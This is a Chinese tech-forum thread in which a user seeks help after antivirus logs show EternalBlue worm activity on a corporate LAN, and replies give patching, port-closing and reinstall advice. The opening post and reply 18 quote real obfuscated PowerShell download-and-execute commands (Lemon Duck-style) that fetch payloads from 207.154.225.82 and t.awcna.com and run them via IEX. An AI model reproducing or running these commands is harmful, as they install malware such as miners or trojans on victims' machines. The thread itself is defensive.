这是一个创建于 333 天前的主题,其中的信息可能已经有所发展或是发生改变。
操作进程:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
命令行:powershell -c "try{$localIf=$flase;New-Object Threading.Mutex($true,'Global\eLocalIf',[ref]$localIf)}catch{};$ifmd5='1cd2db7421c0b88eb89eb6182bd6785e';$ifp=$env:tmp+'\if.bin';$down_url='http://207.154.225.82';function gmd5($con){[System.Security.Cryptography.MD5]::Create().ComputeHash($con)|foreach{$s+=$.ToString('X2')};return $s}if(test-path $ifp){$con=[System.IO.File]::ReadAllBytes($ifp);$md5_=gmd5 $con_;if($md5_-eq$ifmd5){$noup=1}}if(!$noup){$con=(New-Object Net.WebClient)."downloaddata"($down_url+'/if.bin?SZXHRZZLIT036&9CBD7D74-E8C3-6E51-230D-12457CECDB29&DC:4A:3E:76:02:A0');$t=gmd5 $con;if($t-eq$ifmd5){[System.IO.File]::WriteAllBytes($ifp,$con)}else{$noup=1}}if($noup){$con=$con_;$ifmd5=$md5_}IEX(-join[char[]]$con)"
攻击方式:Exploit/EternalBlue
远程地址:10.83.3.33:445
防御结果:已阻止
37 条回复 • 2020-05-20 22:06:07 +08:00
 |
1
BrettD 333 天前 via iPhone
勒索软件的感觉
|
 |
2
shadowyue 333 天前
http://207.154.225.82
这个地址我还能访问,是个 nginx |
 |
3
crab 333 天前
局域网没打那补丁?
|
 |
4
phpinfos 333 天前
永恒之蓝 445 端口关掉 打补丁
|
|
7
phpinfos 333 天前
|
 |
8
Osk 333 天前
看这样子怎么像 smb v1 的漏洞补丁没打?
|
|
9
Osk 333 天前
不需要共享打印机和文件夹的话可以先在防火墙里面把本机的 445 等 smb service 端口关闭了,毕竟看样子你是在毒窝里面了🤣
|
|
10
shadowyue 333 天前
淦哦,公司 win10 没法更新补丁
|
|
12
shadowyue 333 天前
it 说自己杀毒就行,一直都有这个病毒🤣
|
|
13
Osk 333 天前
@shadowyue 永恒之蓝在没打补丁或做防护措施的局域网中传播很快的。
win7, win8, win 10 <1703 (好像是这个版本)都会中招。很好奇 win 10 没法更新补丁是什么情况? win10 打补丁比 win7 方便多了,只需要去下载最近的月度累计更新手动安装也很方便。 作为用户,不想打补丁就先把本机的 445、135、137、138、139 端口关闭了,除非你需要共享打印机或者文件给别人。毕竟万一火绒没拦住就惨了 |
|
14
Osk 333 天前
另外,看你们内网的 ip 都是 10 的,看起来是大公司了,it 都这么水吗 /doge/
|
|
15
shadowyue 333 天前
@Osk 公司好像没几个人用 win10,我更新一直都是提示失败了,不知道为啥。
我被攻击了 powershell 这个程序就疯狂跑吃 cpu,好奇别人没这个问题吗,电脑卡爆了应该有别人反馈才对。 公司是蛮大的,工作累了直接睡,没问题 🤣 |
|
16
Osk 333 天前
公司上外网需要使用代理吗?
吃 cpu 而不搞你的文件的话,看起来像挖矿的程序,危害也。。。不大吧 /滑稽 / |
|
18
shadowyue 333 天前
@Osk 大佬救救我,这又是啥
操作进程:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE 命令行:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -c "$Lemon_Duck='1EdJ95\kmSXYuMOLF1';$x='t.awc'+'na.com';;$y='http://'+$x+'/x.js';$z=$y+'p?ipc_20200228';$m=(Ne`w-Obj`ect Net.WebC`lient)."DownloadData"($y);[System.Security.Cryptography.MD5]::Create().ComputeHash($m)|foreach{$s+=$_.ToString('x2')};if($s-eq'a49add2a8eeb7e89b9d743c0af0e1443'){IEX(-join[char[]]$m)}" 风险分类:木马盗号 访问网址:t.awcna.com/x.js 操作结果:已阻止 |
 |
19
Shazoo 333 天前
下载 http://t.awcna.com/x.js ,如果程序的 md5=a49add2a8eeb7e89b9d743c0af0e1443,执行之。
https://x.threatbook.cn/nodev4/domain/awcna.com 看看细节呗。 |
 |
23
ThirdFlame 333 天前  1
你的电脑已经被控制了。 通过 powershell 执行恶意代码 ing
|
|
24
shadowyue 333 天前
@ThirdFlame 怎么处理啊,大佬
|
 |
25
WordTian 333 天前 via Android
备份好重要文件,重装系统吧,联网前关掉 445 端口
|
 |
26
juded 333 天前
火绒行为管理不错,但查杀能力太差了。
|
 |
27
vocaloid 333 天前
把 powershell 进程先杀掉啊。。要不还会干更多的事情
|
 |
28
ihacku 333 天前 via iPhone
这个动作本身已经被拦截了
你没有打补丁,可以在火绒里面打下补丁重启生效 可以通知 IT 发下 10.83.3.33 这台机器中毒了 杀毒打补丁 内网应该不止这一台被感染的 |
|
29
Osk 333 天前
@shadowyue 那我还是建议重装了, 如果非要清理, 最好进入离线系统, 使用其它杀毒软件对 C 盘全盘扫描, 离线的原因是避免恶意程序对自身做隐藏或者干扰.
查杀完成后, 还需要在离线系统(干净的 PE 中)使用 autoruns 等工具对所有的 驱动, 服务, 自启动等项目手工排查, 一些恶意程序隐藏的很好, 我觉得这一步是必须的. 最后问题来了: 都这么麻烦了, 还不如重装. 重装后: 先不要联网, 防火墙关闭 smb v1(445), rdp(3389) 等端口, 不然处在毒窝中分分钟死灰复燃. 不过, 使用最新的 Windows 10 1909 镜像也不要太紧张, 大部分局域网传播的严重漏洞已经封好了. |
 |
30
wanguorui123 333 天前
永恒之蓝的变种蠕虫病毒有点多
|
 |
31
Ailoli 333 天前
之前公司同事电脑出现过,后面断网全盘查杀就解决了
|
 |
32
jousca 333 天前
内网里攻击你那台电脑中了蠕虫,永恒之蓝漏洞。
|
 |
33
manami 333 天前 via Android
你需要卡巴斯基!
|
 |
34
Buges 333 天前 via Android
|
 |
35
emptyiscolor 332 天前
@shadowyue 利用驱动人生后门进行传播的木马,建议直接重装系统然后安装主流杀软吧
|
 |
36
zdswater 251 天前
中奖了,火绒扫了一遍杀了还有。不知道咋处理了
|
Select Language